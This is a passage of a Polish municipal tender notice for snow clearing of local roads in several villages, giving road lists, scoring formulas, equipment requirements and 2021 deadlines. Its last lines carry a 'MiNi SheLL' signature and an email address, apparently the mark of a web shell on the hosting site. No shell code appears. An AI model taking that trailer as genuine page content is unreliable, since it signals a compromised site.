podstawowej, cmentarza <br/>miejscowość Stawisza<br/>- droga w kier cmentarza (okresowo) 0,1km<br/>- parkingi przy kościele<br/>Przewidywana liczba km do zimowego utrzymania dróg wynosi 1450 km <br/>Przewidywana liczba godzin pracy sprzętu przy usuwaniu zasp, odśnieżaniu parkingów wynosi w 240h </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/>a)	cena - 60 % - sposób oceny: Minimalizacja <br/>b)	deklarowany czas reakcji - 40 % <br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. <br/>Ofertom przyznane zostaną punkty obliczone następująco: <br/>a.	kryterium – cena: <br/>(Cn / Cof.b. x 100) x 60 % = ilość punktów, gdzie: <br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej, <br/>100 - wskaźnik stały, <br/>60 % - procentowe znaczenie kryterium ceny. <br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów. Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów. <br/>b.	kryterium – deklarowany czas reakcji wykonania zamówienia: <br/>Zamawiający wymaga, aby Wykonawca przystąpił do realizacji zamówienia najpóźniej w ciągu 60 min od chwili gwałtownej zmiany pogody lub wezwania Zamawiającego.<br/>Wykonawca składając ofertę zobowiązany jest w formularzu ofertowym podać oferowany czas reakcji wykonania zamówienia w minutach.<br/>Ilość punktów dla każdej oferty z czasem reakcji przystąpienia do wykonania zamówienia oceniona zostanie w następujący sposób:<br/>Wymagany maksymalny czas reakcji od chwili wezwania przez zamawiającego -60min.<br/>Oferta, w której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 60minut i więcej otrzyma 0 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 45minut otrzyma 20 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 30minut i krótszy otrzyma 40 pkt. <br/>Jeżeli wykonawca nie poda (nie wpisze) w formularzu oferty czasu reakcji wykonania zamówienia Zamawiający przyjmie do oceny maksymalny czas reakcji od chwili wezwania przez Zamawiającego , w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Punkty w powyższych kryteriach zostaną zsumowane. <br/>Łączna ilość punktów zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 Odśnieżanie dróg gminnych w miejscowości: - Kunkowa (Leszczyny), Nowica (Przysłup), Gładyszów <br/>miejscowość Kunkowa<br/>- droga publiczna nr K270914 Kunkowa – Zalew Klimkówka dł. 0,9km<br/>- droga publiczna nr K270915 Leszczyny Nowica –Magura odcinek dł. 1,3km<br/>miejscowość Nowica (Przysłup)<br/>- droga publiczna nr K270915 Leszczyny - Nowica –Magura i w kier w k. Bielanki dł. 10,0km<br/>miejscowość Gładyszów <br/>- droga publiczna nr K270901 Gładyszów Krzywa dł. 3km + okresowo 1,5km w zależności od potrzeb<br/>- droga publiczna nr K270903 Gładyszów- Beniówka 0,4km<br/>-droga publiczna nr K270902 Gładyszów obok Leśniczówki 0,9km<br/>-droga obok p. Karwat 0,2km<br/>-droga w kier cerkwi 0,2km<br/>-droga działka nr 525 - 0,12 km <br/>-droga działka nr 445 i 447 - 0,13 km<br/>Przewidywana liczba km do zimowego utrzymania dróg wynosi 1320km<br/>Przewidywana liczba godzin pracy sprzętu przy usuwaniu zasp, odśnieżaniu parkingów wynosi w 50h, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/>a)	cena - 60 % - sposób oceny: Minimalizacja <br/>b)	deklarowany czas reakcji - 40 % <br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. <br/>Ofertom przyznane zostaną punkty obliczone następująco: <br/>a.	kryterium – cena: <br/>(Cn / Cof.b. x 100) x 60 % = ilość punktów, gdzie: <br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej, <br/>100 - wskaźnik stały, <br/>60 % - procentowe znaczenie kryterium ceny. <br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów. Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów. <br/>b.	kryterium – deklarowany czas reakcji wykonania zamówienia: <br/>Zamawiający wymaga, aby Wykonawca przystąpił do realizacji zamówienia najpóźniej w ciągu 60 min od chwili gwałtownej zmiany pogody lub wezwania Zamawiającego.<br/>Wykonawca składając ofertę zobowiązany jest w formularzu ofertowym podać oferowany czas reakcji wykonania zamówienia w minutach.<br/>Ilość punktów dla każdej oferty z czasem reakcji przystąpienia do wykonania zamówienia oceniona zostanie w następujący sposób:<br/>Wymagany maksymalny czas reakcji od chwili wezwania przez zamawiającego -60min.<br/>Oferta, w której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 60minut i więcej otrzyma 0 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 45minut otrzyma 20 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 30minut i krótszy otrzyma 40 pkt. <br/>Jeżeli wykonawca nie poda (nie wpisze) w formularzu oferty czasu reakcji wykonania zamówienia Zamawiający przyjmie do oceny maksymalny czas reakcji od chwili wezwania przez Zamawiającego , w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Punkty w powyższych kryteriach zostaną zsumowane. <br/>Łączna ilość punktów zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 5 Odśnieżanie dróg gminnych w miejscowości: Zdynia, Smerekowiec, Regietów, Kwiatoń, Uście Gorlickie (Oderne, Bielańskie) <br/>m. Smerekowiec <br/>-droga gminna publiczna Nr K270906 Smerekowiec - Zdynia przez Ług 1,25km<br/>- droga w kier Szkoły 0,07km<br/>- parking przy szkole i kościele<br/>miejscowość Zdynia<br/> -droga publiczna Nr K270906Smerekowiec - Zdynia przez Ług 2,0km<br/>- droga publiczna nr 271109K Zdynia w kierunku Telepa 0,6km<br/>-droga w kierunku Gbura 0,27km<br/>- droga publiczna nr 271108K Zdynia w kierunku cerkwi 0,38km <br/>- droga w kierunku Szarawara 0,3km<br/>- parkingi obok cerkwi, cmentarza (okresowo)<br/>miejscowość Regietów<br/>- droga publiczna Nr K270907 Regietów Niżny- Regietów Wyżny dł. 1,8km<br/>miejscowość Kwiatoń<br/>- droga publiczna Nr K270922 Kwiatoń obok kościoła i obok Domu wiejskiego dł. 0,5km<br/>- parking obok Domu Wiejskiego <br/>miejscowość Uście Gorlickie<br/>- droga publiczna Nr K270923 Uście osiedle Ptasie i pozostałe drogi osiedlowe dł. 3,6km <br/>- droga publiczna Nr K270923 Uscie Osiedle Homola i pozostałe drogi osiedlowe<br/> drogi na przysiółku Oderne<br/>- droga publiczna nr K270924Uście Gorlickie- Oderne w kier ( Skrypaka) dł. 0,9km<br/>- droga publiczna nr 270940KUście Gorlickie- Oderne II kierunku Gurby dł. 0,2km <br/>- droga publiczna nr K270924Uście Gorlickie- Oderne III kierunku Barcza dł. 0,45km <br/> -droga publiczna nr K271111 w kierunku Sztaba, Nowak dł. 0,45km<br/> droga w kierunku Święs dl. 0,30km<br/>- droga publiczna nr K270938 Uście Gorlickie-,, Osiedle Bielańskie” dł. 1,5km + okresowo 0,5km<br/>- droga publiczna nr K 270939 Uście Gorlickie w kier. Grybosia dł 0,3km<br/> - droga w kierunku oczyszczalni ścieków i punktu SOOK dł. 0,2km<br/>- parkingi przy cmentarzach, szkoła, cerkiew, kościoły, Urząd Gminy, Ośrodek Zdrowia, plac targowy, obok sklepów.<br/>Przewidywana liczba km do zimowego utrzymania dróg wynosi 1570 km<br/>Przewidywana liczba godzin pracy sprzętu przy usuwaniu zasp, odśnieżaniu parkingów wynosi 160h , </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/>a)	cena - 60 % - sposób oceny: Minimalizacja <br/>b)	deklarowany czas reakcji - 40 % <br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. <br/>Ofertom przyznane zostaną punkty obliczone następująco: <br/>a.	kryterium – cena: <br/>(Cn / Cof.b. x 100) x 60 % = ilość punktów, gdzie: <br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej, <br/>100 - wskaźnik stały, <br/>60 % - procentowe znaczenie kryterium ceny. <br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów. Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów. <br/>b.	kryterium – deklarowany czas reakcji wykonania zamówienia: <br/>Zamawiający wymaga, aby Wykonawca przystąpił do realizacji zamówienia najpóźniej w ciągu 60 min od chwili gwałtownej zmiany pogody lub wezwania Zamawiającego.<br/>Wykonawca składając ofertę zobowiązany jest w formularzu ofertowym podać oferowany czas reakcji wykonania zamówienia w minutach.<br/>Ilość punktów dla każdej oferty z czasem reakcji przystąpienia do wykonania zamówienia oceniona zostanie w następujący sposób:<br/>Wymagany maksymalny czas reakcji od chwili wezwania przez zamawiającego -60min.<br/>Oferta, w której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 60minut i więcej otrzyma 0 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 45minut otrzyma 20 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 30minut i krótszy otrzyma 40 pkt. <br/>Jeżeli wykonawca nie poda (nie wpisze) w formularzu oferty czasu reakcji wykonania zamówienia Zamawiający przyjmie do oceny maksymalny czas reakcji od chwili wezwania przez Zamawiającego , w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Punkty w powyższych kryteriach zostaną zsumowane. <br/>Łączna ilość punktów zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 6 Odśnieżanie dróg gminnych w miejscowości Wysowa - Zdrój <br/>- droga w k. pensjonaty dł. 0,6km<br/>- droga obwodnica obok sanatoriów dł. 2,3km<br/>- droga dolina Łopacińskiego dł. 1,15km<br/>- droga Wysowa Zdrój , Huta Wysowska dł. 2,80km<br/>- droga Straż Graniczna dł. 0,85km<br/>- droga obok sklepów dł. 0,5km<br/>- droga w k. p. Kuziów dł. 0,25km<br/>- droga w k. p. Herliczka dł. 0,37km<br/>- droga w k. p. Leśna dł. 0,1km<br/>- droga w k. góry Jawor dł. 0,4km (Kuncik) +1,1km okresowo w zależności od potrzeb<br/>- droga w k. p. Cichoń, Dańcz dł. 0,13km<br/>- droga w k. parku od strony OSP dł. 0,25km<br/>- droga za Romanem dł. 0,15km<br/>- droga w k. Ziemby dł. 0,1km<br/>- droga w k. pensjonatów Kinga dł. 0,3km<br/>- droga w k. pensjonatów Emilia dł. 0,15km<br/>- droga w k. Cichoń dł. 0,1km<br/>- droga w k. garaży dł. 0,1km<br/>- droga w k. p. Wrona dł. 0,2km<br/>- droga w k. szkoły dł. 0,1km<br/>- droga w k. p. Tumidajska dł. 0,17km<br/>- droga w k. p. Zygarowicz dł. 0,2km<br/>- droga w k. p. Hadam dł. 0,1km<br/>- droga do oczyszczalni dł. 0,2 km<br/>- droga w k. p. Stachowiak dł. 0,1km<br/>- droga obok p. Bartko dł. 0,1km<br/>- droga w k. Okarmy dł. 0,5km<br/>- droga w k. Wąs, Kabaj dł. 0,52km<br/>- droga w k. pensjonatów Cukrownik, Gaj, Park Wodny dł. 0,4km<br/>- droga w k. p. Durniak dł. 0,1km<br/>- droga w k. p. Wan-Doren dł. 0,17km<br/>- droga w k. Orlika dł. 0,1km<br/>-droga w k. p. Piątkiweicz 0,3km<br/>- parkingi obok Rozlewni Wód, Karczma Dziurniówka, Park Wodny, sklepy , kościół, szkoła, bloki mieszkalne ,chodniki przy drogach , gminnych i osiedlowych i powiatowej <br/>- chodnik przy drodze Wysowa Zdrój – obwodnica sanatoria dł. 2,35km<br/>- chodnik przy drodze Wysowa Zdrój- Dolina Łopacińskiego dł. 1,15km<br/>- chodnik przy drodze Wysowa Zdrój – Huta Wysowska dł. 0,5km<br/>- chodnik przy drodze Wysowa Zdrój – Obwodnica sklepy dł. 0,5km<br/>- chodnik przy drodze w k. Parku od strony OSP dł. 0,5km<br/>- chodniki na terenie Parku Zdrojowego wg. ustaleń.<br/>Przewidywana liczba godzin pracy sprzętu przy odśnieżaniu i posypywaniu dróg , chodników i parkingów wynosi 990h </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert zamawiający będzie się kierował następującymi kryteriami i ich wagami: <br/>a)	cena - 60 % - sposób oceny: Minimalizacja <br/>b)	deklarowany czas reakcji - 40 % <br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi. <br/>Ofertom przyznane zostaną punkty obliczone następująco: <br/>a.	kryterium – cena: <br/>(Cn / Cof.b. x 100) x 60 % = ilość punktów, gdzie: <br/>Cn - najniższa cena spośród ofert, <br/>Cof.b. - cena oferty badanej, <br/>100 - wskaźnik stały, <br/>60 % - procentowe znaczenie kryterium ceny. <br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma maksymalną ilość 60 punktów. Pozostałym wykonawcom spełniającym wymagania kryterialne przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów. <br/>b.	kryterium – deklarowany czas reakcji wykonania zamówienia: <br/>Zamawiający wymaga, aby Wykonawca przystąpił do realizacji zamówienia najpóźniej w ciągu 60 min od chwili gwałtownej zmiany pogody lub wezwania Zamawiającego.<br/>Wykonawca składając ofertę zobowiązany jest w formularzu ofertowym podać oferowany czas reakcji wykonania zamówienia w minutach.<br/>Ilość punktów dla każdej oferty z czasem reakcji przystąpienia do wykonania zamówienia oceniona zostanie w następujący sposób:<br/>Wymagany maksymalny czas reakcji od chwili wezwania przez zamawiającego -60min.<br/>Oferta, w której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 60minut i więcej otrzyma 0 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 45minut otrzyma 20 pkt. <br/>Oferta, której Wykonawca zadeklaruje czas reakcji przystąpienia do wykonania zamówienia 30minut i krótszy otrzyma 40 pkt. <br/>Jeżeli wykonawca nie poda (nie wpisze) w formularzu oferty czasu reakcji wykonania zamówienia Zamawiający przyjmie do oceny maksymalny czas reakcji od chwili wezwania przez Zamawiającego , w przypadku wyboru oferty Wykonawcy okres ten zostanie uwzględniony w umowie.<br/>Punkty w powyższych kryteriach zostaną zsumowane. <br/>Łączna ilość punktów zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>Maksymalna ilość punktów jaką po uwzględnieniu wag może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">deklarowany czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>1)	Dysponuje w okresie wykonywania zamówienia technicznie sprawnymi jednostkami sprzętowymi do realizacji usługi zimowego utrzymania dróg tj. sprzętem do odśnieżania i zwalczania śliskości (w szczególności samochody lub inne pojazdy samobieżne jako nośniki pługów, piaskarki). Wykonawca winien wykazać, że dysponuje lub będzie dysponował w okresie wykonywania zamówienia minimum jedną jednostką sprzętową do odśnieżania i zwalczania śliskości wraz z obsługą o mocy min 45KM dla zadania nr 1-5, oraz dodatkowo jedną jednostką sprzętową do odśnieżania chodników dla zadania nr 6. Z uwagi na zróżnicowaną konfigurację terenu gminy, biorąc pod uwagę szerokość nawierzchni dróg zastosowana do odśnieżania jednostka napędowa musi posiadać napęd na dwie osie. Lemiesz pługa winien być wyposażony w elastyczne zakończenie (listwa gumowa).<br/>W przypadku, gdy Wykonawca składa ofertę na realizację usługi na więcej niż jedną cześć winien wykazać, że dysponuje lub będzie dysponował w okresie wykonywania zamówienia minimum jedną jednostkę sprzętową na każdą część od 1- do 5, a w przypadku składania oferty na cześć od 1 do 5 i 6 minimum jedną jednostkę sprzętową na każdą cześć plus jednostka do odśnieżania.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunek, o którym mowa w ust. 1 pkt 1) musi być spełniony przez co najmniej jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie o aktualności informacji zwartych w oświadczeniu o niepodleganiu wykluczeniu – zgodnie ze wzorem stanowiącym Załącznik nr 7 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)	Wykaz sprzętu przeznaczonego do świadczenia usługi – zgodnie ze wzorem stanowiącym Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda załączenia przez wykonawcę do oferty przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo (jeżeli dotyczy), zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do oferty zobowiązani są dołączyć pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy albo postępowaniu i zawarcia umowy. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie sporządzone zgodnie ze wzorem stanowiącym Załącznik Nr 3 do SWZ składa każdy z Wykonawców w zakresie w jakim wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy następować będą na zasadach podanych w art. 455 ustawy Pzp oraz w projektowanych postanowieniach umowy. 1.	Projektowane postanowienia umowy stanowi Załącznik Nr 1 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-03 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. 7.	Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika” dostępnej na stronie: : https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com